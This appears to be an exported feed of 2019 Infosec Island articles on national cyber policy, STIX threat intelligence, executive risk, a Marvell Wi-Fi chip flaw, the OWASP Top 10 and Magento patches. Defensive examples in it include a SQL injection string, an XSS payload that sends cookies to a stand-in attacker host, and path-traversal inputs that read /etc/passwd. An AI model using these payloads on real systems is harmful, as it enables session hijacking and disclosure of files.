Infosec Island Latest Articles
https://infosecisland.infosecisland.com
Adrift in Threats? Come Ashore!

Trump Administration Starts the Ball Rolling with the National Cyber Strategy
https://www.infosecisland.com/blogview/25173-Trump-Administration-Starts-the-Ball-Rolling-with-the-National-Cyber-Strategy.html
Tue, 19 Feb 2019 06:11:07 -0600

The Trump Administration has released a comprehensive National Cyber Strategy (NCS) that, if fully implemented, could address claims that the critical issue of current cyberspace threats is not being taken seriously enough. The report outlines a plan that spans all federal agencies, directing how they should work separately and in tandem with private industry and the public to detect and prevent cyber attacks before they happen, as well as mitigate damage in the aftermath.

The NCS is the first formal attempt in 15 years to plan and implement a national policy for the cyber arena, and it takes the form of a high-level policy statement rather than the more targeted form of a Presidential directive. The plan offers plenty in the way of big-picture goals, but critics will be watching to see whether details emerge in the coming months and years to fill in the gaps with specific action.

With the release, the Administration formally recognizes that cyberspace has become such an entwined part of American society as to be functionally inseparable. The bottom line is that cybersecurity now falls under the larger umbrella of national security and is not considered a standalone entity.

Army Lt. Gen. Paul Nakasone, speaking at his recent confirmation hearing for the position of leader of U.S. Cyber Command and the secretive National Security Agency, emphasized the importance of this moment in our national history: “We are at a defining time for our Nation and our military...threats to the United States’ global advantage are growing -- nowhere is this challenge more manifest than in cyberspace.”

Sifting through the digital pages of the NCS document reveals the Administration’s focus on the four conceptual pillars of National Security that now have been expanded to accommodate cyber concerns.

Pillar 1: Protecting and Securing the American Way of Life

Considering the present mashup state of the federal procurement process, the new aim is to secure government computer networks and information, primarily through tougher standards, cross-agency cooperation, and the strengthening of US government contractor systems and supply chain management. Electronic surveillance laws will also likely be bolstered, a reality that may result in the netting of more criminals but poses privacy concerns to those who think that the line has been smudged too many times in this area already.

Securing all levels of election infrastructure against hacks and misinformation falls into this category. If recent history is any indication, the coming 2020 presidential election will likely inspire a flurry of attempted cyber intrusions.

Pillar 2: Focus on American Prosperity

Operating on the assumption that economic security is intrinsically linked to national security, the NCS lays out a strategy to achieve financial strength through fortification of the technological ecosystem. Plans are to be developed to support and reward those in the marketplace who create, adopt, and push forward the innovation of online security processes.

Though debates over funds for national infrastructure are eternal, the discussion will now expand to include the security and promotion of technology infrastructure as well, especially as it relates to the 5G network protocol, quantum computing, blockchain technology, and artificial intelligence.  

Pillar 3: Peace Through Strength

As the world becomes ever more digitized, criminals have moved offline operations into cyberspace. Perhaps unsurprisingly, the Trump Administration intends to push back hard against efforts to disrupt, deter, degrade, or destabilize the world from both nation-state and non-state actors.

National security advisor John Bolton, though refusing to specify operations or adversaries, emphasized the point to USA Today that aggressive action should be expected, saying, “We are going to do a lot of things offensively. Our adversaries need to know that.”

At least part of this offensive strategy will include the creation of an international law framework (the Cyber Deterrence Initiative, or CDI) that will be charged with policing cyberspace behavior and organizing a cooperative response against those who flout the standards. The CDI’s stated goals will be to counter sources of online disinformation and propaganda with its own brand of the same.

Pillar 4: Advance American Influence

By staking out an America-first role as thought and action leader in cyberspace, the NCS promises to take the lead in collaborating with like-minded partners to create and preserve a secure, free internet. Considering the well-known surveillance efforts of organizations like the Five Eyes, one can’t help but wonder if the term “internet freedom” is an oxymoron in the making with the government leading the way.

With the NCS, the Trump Administration has laid out a broad platform for addressing cybersecurity concerns. If it’s the down and dirty details of how exactly this will happen you seek, sorry to disappoint, but it’s not in there.

With the next big election close enough to smell, and Congress divided, little of legislative importance is likely to unfold in the near future; don’t expect Democrats and Republicans to find the motivation to drag out their crayons and fill in the president’s cybersecurity outline.

Until then, let’s hope the internet doesn’t implode under an onslaught of fake news, cat videos, and hackers gone wild. One thing you can bet your last dollar on -- the topic of cybersecurity won’t go away. Like national security in general, it will remain eternal fodder for future politicians to bat around. As to whether the NCS will actually make a difference, only time will tell.

Meanwhile, Nero fiddles and Rome burns.

About the author: A former defense contractor for the US Navy, Sam Bocetta turned to freelance journalism in retirement, focusing his writing on US diplomacy and national security, as well as technology trends in cyberwarfare, cyberdefense, and cryptography.

A Call to Structure
https://www.infosecisland.com/blogview/25174-A-Call-to-Structure.html
Fri, 15 Feb 2019 05:15:00 -0600

When building a threat intelligence team you will face a range of challenges and problems. One of the most significant is how best to take on the ever-growing amount of threat intel. It might sound like a luxurious problem to have: the more intel the better! But if you take a closer look at what the available threat intelligence supply looks like, or rather, the way it is packaged, the problem becomes apparent. Ideally, you would want to take this ever-growing field of threat intelligence supply and work to converge on a central data model – specifically, STIX (Structured Threat Information eXpression). STIX is an open standard language supported by the OASIS open standards body, designed to represent structured information about cyber threats.
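
To make that concrete, here is a minimal sketch of what structured intelligence looks like in STIX, using the open-source stix2 Python library published by the OASIS community (pip install stix2). The indicator name, hash value, and malware name are invented for illustration:

```python
from stix2 import Indicator, Malware, Relationship

# A hypothetical indicator for a known-bad file hash (illustrative values only).
indicator = Indicator(
    name="Example malicious installer",
    pattern="[file:hashes.'SHA-256' = "
            "'aec070645fe53ee3b3763059376134f058cc337247c978add178b6ccdfb0019f']",
    pattern_type="stix",
)

# The malware the indicator points to, and the relationship between the two.
malware = Malware(name="ExampleRAT", is_family=False)
rel = Relationship(indicator, "indicates", malware)

# Serializing yields interoperable JSON that any STIX-aware tool can ingest.
print(indicator.serialize(pretty=True))
```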

This isn’t a solo effort, so first the intelligence team needs to align properly with the open standards bodies. I was thrilled to deliver our theories around STIX data modeling to the OASIS and FIRST communities at the Borderless Cyber Conference in Prague in 2017. (The slides from this are available for download here.) Our team took this to the next level as we started to include not just standard data structures in our work, but standardized libraries, including MITRE’s ATT&CK (Adversarial Tactics, Techniques & Common Knowledge) framework that now forms a core part of our TTP (and, to some extent, Threat Actor) mapping across our knowledge base. We couldn’t have done it without the awesome folk at OASIS and MITRE. Those communities are still our cultural home.

So far, so good… but largely academic. The one thing I always say to teams who start planning their CTI journeys is: “Deploy your theory to practice ASAP – because it will change.” CTI suppliers know this all too well. In the ensuing months, our threat intel team faced the challenge of merging these supplier sources into a centralized knowledge base. We’re currently up to 38 unique source organizations (with 50+ unique feeds across those suppliers), around a third of them top-flight commercial suppliers. And, of course, even in this age of STIX and MISP, we still see the full spectrum of implementations from those suppliers. Don’t get me wrong – universal STIX adoption is a utopia (this is my version of ‘memento mori’ that I should get my team to say to me every time I go on my evangelism sprees), and we should not expect all suppliers to ‘conform’ in some totalitarian way. But here is my question to you: Who designs your data model? I would love to meet them.

Now here’s the thing: if you’re anything like my boss, you probably don’t care how the data model is implemented – so long as the customer can get the data fields they need from your feed, what does it matter? REST + JSON everywhere, right? But the future doesn’t look like that. The one thing that the STIX standard is teaching people better than most other structured languages is the importance of decentralization. I should be able to use the STIX model to build intelligence in one location and have it be semantically equivalent (though not necessarily identical) to intelligence built by a different analyst in another location. The two outputs should be logically similar – recognizably so, by some form of automated interpretation that doesn’t require polymorphism or a cryptomining rig to calculate – but different enough to capture the unique artistry of the analysts who created them. Those automatically discernible differences are the pinnacle of a shared, structured-intelligence knowledge base that will keep our data relevant, allow for automated cross-referencing and take the industry to the next level.
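
As a rough illustration of “semantically equivalent but not identical,” consider two analysts who independently capture the same observable. This sketch (again assuming the stix2 library; the domain and names are invented) uses a deliberately naive comparison; production tooling would weight many properties rather than demand an exact pattern match:

```python
from stix2 import Indicator

# Two analysts describe the same infrastructure independently: different ids,
# names and timestamps, but a logically identical detection pattern.
a = Indicator(name="Bad domain (analyst A)",
              pattern="[domain-name:value = 'evil.example.com']",
              pattern_type="stix")
b = Indicator(name="Suspected C2 domain (analyst B)",
              pattern="[domain-name:value = 'evil.example.com']",
              pattern_type="stix")

def roughly_equivalent(x, y):
    """Naive equivalence check: same object type and same detection pattern."""
    return x.type == y.type and x.pattern == y.pattern

print(roughly_equivalent(a, b))  # True, even though the objects are not identical
```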

There is a downside, of course. The cost of implementation is the first hurdle – it may mean reengineering a data model and maybe even complete rebuilds of knowledge repositories. With any luck, it can just be a semantic modelling (similar to what I presented at Borderless Cyber, but instead of STIX 1.2 → STIX 2.1, just → STIX 2.1) that you can describe with some simple mapping and retain your retcon. But perhaps the biggest elephant in the room is that aligning all suppliers to a common data model means leaving people open to de-duplication and cross-referencing. As we start to unify our data models, that “super-secret source” that was actually just a re-package of some low-profile, open source feed is going to get doxed. We think this is a good thing – data quality, uniqueness and provenance will speak for themselves, and those suppliers who vend noise will lose business. This should be an opportunity rather than a threat, and hopefully it will reinforce supplier business models to provide truly valuable intelligence to customers.

About the author: Chris O'Brien is the Director of Intelligence Operations at EclecticIQ. Prior to his current role, Chris held the post of Deputy Technical Director at NCSC UK, specialising in technical knowledge management to support rapid response to cyber incidents.

What CEOs Need to Know About the Future of Cybersecurity
https://www.infosecisland.com/blogview/25172-What-CEOs-Need-to-Know-About-the-Future-of-Cybersecurity.html
Thu, 14 Feb 2019 06:09:00 -0600

Until recently, Chief Executive Officers (CEOs) received information and reports encouraging them to consider information and cyber security risk. However, not all of them understood how to respond to those risks and the implications for their organizations. In today’s global business climate, the CEO, along with every member of an organization’s board of directors (BoD), needs a thorough understanding of what happened and why it is necessary to properly understand and respond to the underlying risks. Without this understanding, risk analyses and resulting decisions may be flawed, leading organizations to take on greater risk than intended.

After reviewing the current threat landscape, I want to call specific attention to four prevalent areas of information security that all CEOs need to be familiar with in the day to day running of their organization.

Risk Management

Cyberspace is an increasingly attractive hunting ground for criminals, activists and terrorists motivated to make money, get noticed, cause disruption or even bring down corporations and governments through online attacks. Over the past few years, we’ve seen cybercriminals demonstrating a higher degree of collaboration amongst themselves and a degree of technical competency that caught many large organizations unawares.

CEOs must be prepared for the unpredictable so they have the resilience to withstand unforeseen, high-impact events. Cybercrime, the rise of online causes (hacktivism), the growing cost of compliance with an uptick in regulatory requirements, and relentless advances in technology, all against a backdrop of underinvestment in security departments, can combine to cause the perfect threat storm. Organizations that identify what the business relies on most will be well placed to quantify the business case for investing in resilience, thereby minimizing the impact of the unforeseen.

Avoiding Reputational Damage

Attackers have become more organized, attacks have become more sophisticated, and all threats are more dangerous, posing greater risks to an organization’s reputation. In addition, brand reputation and the trust dynamic that exists amongst suppliers, customers and partners have emerged as very real targets for the cybercriminal and hacktivist. With the speed and complexity of the threat landscape changing on a daily basis, all too often we’re seeing businesses being left behind, sometimes in the wake of reputational and financial damage.

CEOs need to ensure they are fully prepared to deal with these ever-emerging challenges by equipping their organizations better to deal with attacks on their reputations. This may seem obvious, but the faster you can respond to these attacks on reputation, the better your outcomes will be.

Securing the Supply Chain

When I look for key areas where information security may be lacking, one place I always come back to is the supply chain. Supply chains are the backbone of today’s global economy, and businesses are increasingly concerned about managing major supply chain disruptions. CEOs are right to be concerned about how exposed their supply chains are to various risk factors, and businesses must focus on the most vulnerable spots in their supply chains now. The unfortunate reality of today’s complex global marketplace is that not every security compromise can be prevented beforehand.

Being proactive now also means that you – and your suppliers – will be better able to react quickly and intelligently when something does happen. In extreme but entirely possible scenarios, this readiness and resiliency may dictate competitiveness, financial health, share price, or even business survival.

Employee Awareness and Embedded Behavior

Organizations continue to invest heavily in ‘developing human capital’. No CEO’s speech or annual report would be complete without stating its value. The implicit idea behind this is that awareness and training always deliver some kind of value with no need to prove it: employee satisfaction was considered enough. This is no longer the case. Today’s CEOs often demand return-on-investment forecasts for the projects they have to choose between, and awareness and training are no exception. Evaluating and demonstrating their value is becoming a business imperative. Unfortunately, there is no single process or method for introducing information security behavior change, as organizations vary so widely in their demographics, previous experiences, achievements and goals.

While many organizations have compliance activities which fall under the general heading of ‘security awareness’, the real commercial driver should be risk, and how new behaviors can reduce that risk. The time is right and the opportunity to shift away from awareness to tangible behaviors has never been greater. CEOs have become more cyber-savvy, and regulators and stakeholders continually push for stronger governance, particularly in the area of risk management. Moving to behavior change will provide the CISO with the ammunition needed to provide positive answers to questions that are likely to be posed by the CEO and other members of the senior management team.

Stay Ahead of Possible Security Stumbling Blocks

Businesses of all shapes and sizes are operating in a progressively cyber-enabled world and traditional risk management isn’t agile enough to deal with the risks from activity in cyberspace. Enterprise risk management must be extended to create risk resilience, built on a foundation of preparedness, that evaluates the threat vectors from a position of business acceptability and risk profiling. 

Organizations have varying degrees of control over evolving security threats and with the speed and complexity of the threat landscape changing on a daily basis, far too often I’m seeing businesses getting left behind, sometimes in the wake of reputational and financial damage. CEOs need to take the lead and take stock now in order to ensure that their organizations are better prepared and engaged to deal with these ever-emerging challenges.

About the author: Steve Durbin is Managing Director of the Information Security Forum (ISF). His main areas of focus include strategy, information technology, cyber security and the emerging security threat landscape across both the corporate and personal environments. Previously, he was senior vice president at Gartner.

Who’s Responsible for Your Cyber-Security?
https://www.infosecisland.com/blogview/25169-Whos-Responsible-for-Your-Cyber-Security.html
Tue, 12 Feb 2019 05:56:00 -0600

Threats to online security are constantly evolving, and organisations are more aware than ever of the risks they pose. But no matter how seriously cyber security is viewed by most businesses, many still fall short of properly addressing some of the biggest issues. In fact, recent figures from the government show that over four in ten UK businesses have suffered a cyber breach or attack within the last 12 months.

Two of the most common types of attack exploit lapses in basic computer hygiene: fraudulent emails and cyber criminals impersonating organisations. The bigger question isn’t how to secure your business, but who takes ownership of the cyber security process.

Not just the IT department’s responsibility

The responsibility for an organisation’s cyber security often falls on the IT department, which historically dealt with the security of IT systems. At face value this makes sense - as the resident tech experts, the IT department is often best positioned to choose the tools and solutions that make a business secure.

In general, these tools serve the purpose of assessing and encrypting your sensitive information, or blocking malicious activity at the source. But cyber threats can often begin outside the IT department. It only takes a single staff member opening a malicious attachment or clicking on a link in a phishing email for hackers to find a way in, and sometimes even the most sophisticated cyber security solutions can’t prevent this.

This makes it next to impossible for the IT department to keep the entire organisation secure, since they can’t be constantly monitoring every person’s click of the mouse. The onus, therefore, falls on every single staff member within the organisation to be cyber aware.

Do the board need to be involved?

High-profile, malicious attacks, such as WannaCry and NotPetya, have grown increasingly prolific in recent years. The potentially devastating effects of these attacks have meant that cyber security has become an integral facet of an organisation’s risk assessment and management.

But despite the prevalence of these successful attacks, there is often still a lack of understanding amongst some board members when it comes to tackling these threats – in fact, our analysis found that only 30% of senior leadership teams have an in-depth understanding of the risks associated with evolving cyber threats.

Flagging the importance of cyber awareness with the board is therefore essential, particularly to increase their awareness of the most common cyber threats and any potential security gaps. More pressingly, the board often have direct access to the most sensitive data within your organisation, which makes them the perfect target for potential cyber criminals. Arming the board with the tools and knowledge to spot potentially malicious emails, links or attachments – in the same way that you would the rest of the organisation – could help to prevent potentially disastrous consequences. 

It’s everybody’s responsibility

Although cyber security certainly does need to be a board-level concern, it’s still important to remember that the safety of your organisation is everybody’s responsibility. As a security and technology expert within the business, you have an integral role in ensuring that everybody’s knowledge is up to scratch.

Thoroughly educating staff on the warning signs to look out for in order to spot a malicious email, or activities that they should avoid when using business devices can greatly improve the overall cyber security of your business. When combined with encryption, and other online security tools, the likelihood of experiencing a cyber attack can be greatly diminished. Cyber security is everybody’s responsibility – make sure that staff have the tools, and the knowledge, to do it properly.

About the author: Matt Johnson is Chief Technology Officer at Intercity Technology. With over 25 years’ business and technical experience in providing IT solutions, Matt’s expertise covers the design, implementation, support and management of complex communications networks.

CERT/CC Warns of Vulnerabilities in Marvell Avastar Wireless SoCs
https://www.infosecisland.com/blogview/25171-CERTCC-Warns-of-Vulnerabilities-in-Marvell-Avastar-Wireless-SoCs.html
Fri, 08 Feb 2019 10:57:12 -0600

The CERT Coordination Center (CERT/CC) has issued a vulnerability note providing information on a series of security issues impacting Marvell Avastar wireless system-on-chip (SoC) models.

Initially presented by Embedi security researcher Denis Selianin at the ZeroNights conference on November 21-22, 2018, and tracked as CVE-2019-6496 (CVSS score 8.3), the vulnerability could allow an unauthenticated attacker within Wi-Fi radio range to execute code on a vulnerable system.

The security researcher discovered multiple vulnerabilities in the Marvell Avastar devices (models 88W8787, 88W8797, 88W8801, and 88W8897), the most important of which is a block pool overflow during Wi-Fi network scans.

The vulnerability can be exploited via malformed Wi-Fi packets during identification of available Wi-Fi networks. 

“During Wi-Fi network scans, an overflow condition can be triggered, overwriting certain block pool data structures. Because many devices conduct automatic background network scans, this vulnerability could be exploited regardless of whether the target is connected to a Wi-Fi network and without user interaction,” the CERT/CC vulnerability note reads.

Depending on the implementation, the attack could result in either network traffic interception or in achieving code execution on the host system. 

Marvell has acknowledged the issue and released a statement revealing that it has already deployed a fix in its standard driver and firmware.

“We have communicated to our direct customers to update to Marvell’s latest firmware and driver to get the most recent security enhancements, including support for WPA3,” Marvell said. 

Given that the vulnerability requires the attacker to be within Wi-Fi radio range of the target, users can mitigate exploitation by restricting access to the area around vulnerable devices. Disabling Wi-Fi on systems that have other connectivity options should also prevent the attack, CERT/CC says. 

“Marvell is not aware of any real world exploitation of this vulnerability outside of a controlled environment,” Marvell noted, encouraging customers to contact their Marvell representative for additional support.  

The United States Computer Emergency Readiness Team (US-CERT) also encourages users and administrators to review CERT/CC’s Vulnerability Note and refer to vendors for appropriate updates.

Related: Researcher Escalates Privileges on Exchange 2013 via NTLM Relay Attack

Related: Vulnerability Exposes Rockwell Controllers to DoS Attacks

Mozilla Concerned About Facebook’s Lack of Transparency
https://www.infosecisland.com/blogview/25170-Mozilla-Concerned-of-Facebooks-Lack-of-Transparency.html
Tue, 05 Feb 2019 21:46:03 -0600

Mozilla is concerned about Facebook’s lack of transparency regarding political advertising, Chief Operating Officer Denelle Dixon said last week in a letter to the European Commission.

Mozilla is currently working to launch its Firefox Election package for the European Union Parliament Elections and says it is not able to provide EU residents with the desired transparency, mainly due to challenges encountered with their Ad Analysis for Facebook add-on. 

The add-on, Dixon explains, analyzes a user’s Facebook feed to identify ads and how the user is being targeted, and informs the user on that. The data is also compared to information from public sources, to show differences in ads served to specific users.

“These two pieces of functionality are critical to bringing greater transparency to political advertising and to advertising in general. However, recent changes to the Facebook platform have prevented third parties from conducting analysis of the ads users are seeing. This limits our ability to deliver the first piece of functionality identified above,” the letter (PDF) reads. 

Dixon also points out that “there is currently a lack of publicly available data about political advertising on Facebook in the European Union that can be compared to information about what ads users are seeing.” 

The issue, Dixon says, is that Facebook hasn’t yet fulfilled its commitments under the political advertising and issue-based advertising section of the Code of Practice on Disinformation.

She also points out that, although Facebook said in August it would roll out an Ad Archive API to make “advertising more transparent to help prevent abuse on Facebook, especially during elections,” the social platform has kept the API private. 

Recently, Facebook also said it would release a new political transparency tool in March, but Mozilla believes the tool will be similar to the Ad Archive website made available in the United States last year. 

“This site allows for simple keyword searches. We do not believe that the site meets the commitments in the Code. It has design limits that prevent more sophisticated research and trend analysis on the political ads,” Dixon notes.

“Transparency cannot just be on the terms with which the world’s largest, most powerful tech companies are most comfortable. To have true transparency in this space, the Ad Archive API needs to be publicly available to everyone,” she continues. 

Dixon, who encourages the Commission to raise these concerns with Facebook directly, reveals that Mozilla has spoken to Facebook about these concerns, but that a path towards meaningful public disclosure of the data needed hasn’t been identified yet. 

“We urge Facebook to develop an open, functional API that can be used by any developer, researcher, or organisation to develop tools, critical insights, and research designed to educate and empower users to understand and therefore resist targeted disinformation campaigns,” Dixon notes. 

Related: Misinformation Woes Could Multiply With 'Deepfake' Videos

Related: Israel Seeks to Beat Election Cyber Bots

OWASP: What Are the Top 10 Threats and Why Does It Matter?
https://www.infosecisland.com/blogview/25168-OWASP-What-Are-the-Top-10-Threats-and-Why-Does-It-Matter-.html
Wed, 30 Jan 2019 06:00:00 -0600

Since the founding of the Open Web Application Security Project (OWASP) in 2001, it has become a leading resource for online security best practices. OWASP identifies itself as an open community dedicated to enabling organizations to develop and maintain applications and APIs that are protected from common threats and exploits.

In particular, they publish a list of the “10 Most Critical Web Application Security Risks,” which effectively serves as a de facto application security standard. The “Top 10” are the most critical risks to web application security, as selected by an international group of security experts. The free information lists several vulnerabilities that are easy to overlook, including insufficient attack protection in applications, cross-site request forgeries, broken access controls, under-protected APIs, and more.

Nearly every organization requires an online presence to conduct business, which means virtually every organization should be aware of web-based vulnerabilities and design a plan to address them. Understanding the OWASP Top 10 is the first step toward ensuring you won’t leave yourself vulnerable.

Top 10 web application threats to know

  1. Injection: Injection flaws such as SQL, NoSQL, OS, and LDAP injections can attack any source of data and involve attackers sending malicious data to an interpreter. This is a very prevalent threat in legacy code and can result in data loss, corruption, access compromise, and complete host takeover. Using a safe database API, a database abstraction layer, or a parameterized database interface helps reduce the risk of injection threats (see the first sketch after this list).
  2. Broken Authentication: Incorrectly implemented session management or authentication gives attackers the ability to steal passwords or tokens, or to impersonate user identities. This is widespread due to poorly implemented identity and access controls. Implementing multi-factor authentication and weak-password checks is a great start to preventing this problem. However, don’t fall into the trap of enforcing composition rules on passwords (such as requiring uppercase, lowercase, numeric and special characters), as these have been shown to weaken rather than strengthen security.
  3. Sensitive Data Exposure:  When web applications and APIs aren’t properly protected, financial, healthcare, or other personally identifiable information (PII) data can be stolen or modified and then used for fraud, identity theft, or other criminal activities. Proper controls, encryption, removal of unnecessary data, and strong authentication can help to prevent exposure. 
  4. XML External Entities (XXE): Attackers can exploit vulnerable XML processors by including malicious content in an XML document. External entities can disclose internal files or be used to execute internal port scanning, remote code execution, and DDoS attacks. It is difficult to identify and eliminate XXE vulnerabilities, but a few straightforward improvements are patching all XML processors, ensuring comprehensive validation of XML input according to a schema, and limiting XML input where possible.
  5. Broken Access Control: This happens when policies on what users can access are loosely enforced. This results in attackers exploiting flaws to access data and functionality they are not authorized to access, such as accessing other users’ accounts, viewing sensitive files, modifying other users’ data, and changing access rights. It is suggested to use access control that is enforced in trusted server-side code, or even better, an external API gateway.
  6. Security Misconfiguration: Misconfigurations are the most common threat to organizations. This results from insecure or incomplete default configurations, open cloud storage, and verbose error messages. It is essential to securely configure and patch all operating systems, frameworks, libraries, and applications, and to follow best practices suggested by each hardware or software vendor to harden their systems.
  7. Cross-Site Scripting (XSS): These flaws occur when an application includes untrusted data in a web page. With XSS flaws, attackers can execute scripts in the victim’s browser, which can result in hijacked user sessions, defaced websites, or redirecting the user to a malicious site. In order to prevent XSS, you must separate untrusted data from active browser content, for example by using libraries that automatically escape user input (see the second sketch after this list).
  8. Insecure Deserialization: Insecure deserialization often leads to remote code execution scenarios. Even if remote code execution doesn’t happen, these flaws can be used to perform replay, injection, and privilege escalation attacks. One way to prevent this is not to accept serialized objects from untrusted sources. 
  9. Using Components with Known Vulnerabilities: Components include operating systems, web servers, web frameworks, encryption libraries, or other software modules. Applications and APIs using components with known vulnerabilities will undermine application protection measures and enable several types of attacks. A strong patch management process largely prevents this problem.
  10. Insufficient Logging and Monitoring: Insufficient logging and monitoring can allow attackers to spread unchecked within an organization, maintain persistence, and extract or destroy data. This can leave attackers with access for weeks, sometimes months. Using an effective monitoring and incident alerting solution can close the gap and spot attackers much more quickly.
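
Two of the items above lend themselves to tiny, concrete illustrations. First, injection (item 1): this sketch uses Python’s built-in sqlite3 module with an invented users table to show why a parameterized query defeats a classic payload that string concatenation would let through:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice')")

user_input = "alice' OR '1'='1"  # a classic injection payload

# Vulnerable: string concatenation lets the payload rewrite the query and
# match every row:
#   conn.execute("SELECT * FROM users WHERE name = '" + user_input + "'")

# Safe: a parameterized query treats the input strictly as data.
rows = conn.execute(
    "SELECT * FROM users WHERE name = ?", (user_input,)).fetchall()
print(rows)  # [] -- the payload matches no user instead of dumping the table
```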
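Second, cross-site scripting (item 7): this sketch uses Python’s standard html.escape helper to show how escaping turns an untrusted script payload into inert text before it reaches the browser (the cookie-stealing payload is invented for illustration):

```python
from html import escape

comment = '<script>document.location="https://attacker.example/?c=" + document.cookie</script>'

# Rendering untrusted input verbatim hands the attacker script execution:
unsafe_fragment = "<p>" + comment + "</p>"

# Escaping converts the markup characters into entities, so the browser
# displays the payload as text instead of executing it.
safe_fragment = "<p>" + escape(comment) + "</p>"
print(safe_fragment)  # <p>&lt;script&gt;...&lt;/script&gt;</p>
```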

Keep in mind that these top 10 threats are just the most common of thousands of vulnerabilities that cyber criminals can exploit. Many people overlook web applications when they plan their security, or they falsely assume web applications are protected by their network firewall. In fact, the web application threat vector is one of the most successfully exploited because of these misunderstandings. 

The best way to defend against this threat vector is with a web application firewall (WAF) that is purpose-built to secure your web applications. These firewalls provide several types of Layer 7 security, including DDoS protection, server cloaking, web scraping protection, data loss prevention, web-based identity and access management, and more. Including a web application firewall in an organization’s security strategy and technology stack will ensure protection from these top threats and the many other threats specifically targeting your applications.

About the author: Nitzan Miron is VP of product management and application security at Barracuda Networks.

Magento Patches Command Execution, Local File Read Flaws
https://www.infosecisland.com/blogview/25167-Magento-Patches-Command-Execution-Local-File-Read-Flaws.html
Tue, 29 Jan 2019 09:23:34 -0600

Magento recently addressed two vulnerabilities that could lead to command execution and local file read, an SCRT security researcher reveals.

Written in PHP, Magento is a popular open-source e-commerce platform that is part of Adobe Experience Cloud. Vulnerabilities in Magento – and any other popular content management systems out there – are valuable to malicious actors, as they could be exploited to impact a large number of users.

In September last year, SCRT’s Daniel Le Gall found two vulnerabilities in Magento, both of which could be exploited with low-privilege admin accounts, which are usually provided to marketing users.

The first of the two security bugs is command execution via path traversal. Exploitation, the researcher reveals, requires the user to be able to create products. The second issue is a local file read that requires the user to be able to create email templates.

The root cause of the first issue is a path traversal, which Le Gall discovered in a function that checks whether a file that templates can be loaded from is located in certain directories. The faulty function only checks whether the provided path begins with a specific directory name, not whether the resolved path is in the whitelisted directories.
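
To illustrate the class of bug (Magento’s actual code is PHP; the directory names and helper functions below are hypothetical), compare a prefix-only check with one that resolves the path first:

```python
import os

WHITELIST = ("/var/www/magento/app/design/",)  # hypothetical template root

def is_allowed_naive(path):
    # Flawed: only tests the string prefix, so a ".."-laden path that starts
    # with the whitelisted directory still passes.
    return path.startswith(WHITELIST)

def is_allowed_resolved(path):
    # Safer: resolve ".." and symlinks first, then compare real locations.
    real = os.path.realpath(path)
    return any(real.startswith(os.path.realpath(d) + os.sep) for d in WHITELIST)

probe = "/var/www/magento/app/design/../../../../../../etc/passwd"
print(is_allowed_naive(probe))     # True  -- traversal slips through
print(is_allowed_resolved(probe))  # False -- resolved path is outside the root
```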

Because of the partial checks performed by the function, a path traversal can be called through a Product Design, but only to process .phtml files as PHP code. 

Although .phtml is a forbidden extension on most upload forms, an attacker could create a product with “Custom Options” that permit whatever upload extensions they want, including .phtml. Once the item is ordered, the uploaded file is stored with that extension, which allows for command execution, the researcher says.

The second vulnerability was found in email templating, which allows the use of a special directive to load the content of a CSS file into the email. The two functions that are managing this directive are not checking for path traversal characters anywhere and an attacker could inject any file into the email template.

“Creating an email template with the {{css file="../../../../../../../../../../../../../../../etc/passwd"}} should be sufficient to trigger the vulnerability,” Le Gall says.

The researcher disclosed both vulnerabilities in September last year, and a patch released at the end of November (Magento 2.2.7 and 2.1.16) addressed both of them. The researcher was awarded a total of $7,500 in bug bounty rewards for the findings.

Related: Hacked Magento Sites Steal Card Data, Spread Malware

Related: Magento Patches Critical Vulnerability in eCommerce Platforms

The Biggest Security Hurdles in Your Business, and How to Overcome Them
https://www.infosecisland.com/blogview/25166-The-Biggest-Security-Hurdles-in-Your-Business-and-How-to-Overcome-Them.html
Wed, 23 Jan 2019 01:11:53 -0600

With cyber security spanning almost every aspect of a modern business, implementing effective mitigation policies is often a source of frustration for IT managers.

It’s widely accepted across the industry that with malicious attacks showing no signs of slowing down, organisations have no option but to invest considerable amounts of cash into hiring security professionals and maintaining business privacy. Gartner reported that costs for these investments into cyber security reached $86.4bn worldwide in 2017.

But despite these considerable investments, many organisations are still left in the dark when it comes to exactly what the most common, and pressing, cyber security challenges are, often significantly impacting any returns on this investment.

Selecting and deploying the right security technologies is an important first step, but educating your staff, and your board, can prove to be just as challenging. However, this can be rectified more cost effectively.

Keep your board in the loop

Online security processes are often left entirely to the IT department to manage. As little as 30% of senior business leaders have an in-depth understanding of exactly what online security threats are, which should be a significant cause for concern. More pressingly, 7% have very little or even no understanding of the threats whatsoever.

This is particularly worrying when considering the fact that senior leadership are often the primary target for cyber criminals – in no small part due to the fact that their cyber security knowledge is lacking. This gives cyber criminals the most direct route to sensitive business information or personal data.

Keeping the board in the loop and educating them on what the latest online threats are, how the IT department could mitigate these, and the key things that they should be looking out for will give them a more well-rounded knowledge of cyber security in general, and help to demonstrate the importance of being cyber aware. 

Keep your staff up to speed

Cyber criminals are increasingly resorting to phishing attempts that impersonate board level executives, as well as using phishing PDFs and sites in an effort to target staff members. This method is especially effective against those who may be inexperienced in the role, and can often trick them into divulging sensitive business information.

It’s therefore vital that every staff member within your business has the knowledge and skills necessary to ensure the company stays secure. Since many successful cyber-attacks can be the product of carelessness – often opening malware hidden in attachments or clicking suspicious links – it’s everybody’s responsibility to enact proper due diligence when it comes to cyber security.

Educating staff on best practice, as well as informing them when you are actively stopping potential cyber security threats, can help them to understand the importance of cyber awareness within the company. Something as simple as informing staff on what to look out for when spotting a malicious email can help to nip potential disasters in the bud.

Choose the right security solution

The severity with which malware can affect your business cannot be overstated. Indiscriminate cyber-attacks can have potentially devastating consequences for businesses.

Regardless of the size of your organisation, or the complexity of your operations, it’s vital that your business has a thorough cyber security strategy. 

There are many end-to-end service providers out there that can assist your business by taking responsibility for implementing and managing effective security applications within your organisation. As an IT manager, this can help you to avoid the unexpected costs and rigidity that often come with installing and maintaining fixed security solutions internally.

When combined with educating both the board and the staff within your organisation, cyber security becomes a collaborative effort across your business, strengthening your first line of defence and creating a far more secure environment overall. 

About the author: Matt Johnson is Chief Technology Officer at Intercity Technology. With over 25 years’ business and technical experience in providing IT solutions, Matt’s expertise covers the design, implementation, support and management of complex communications networks.

Four Technologies that will Increase Cybersecurity Risk in 2019
https://www.infosecisland.com/blogview/25165-Four-Technologies-that-will-Increase-Cybersecurity-Risk-in-2019.html
Thu, 17 Jan 2019 09:21:55 -0600

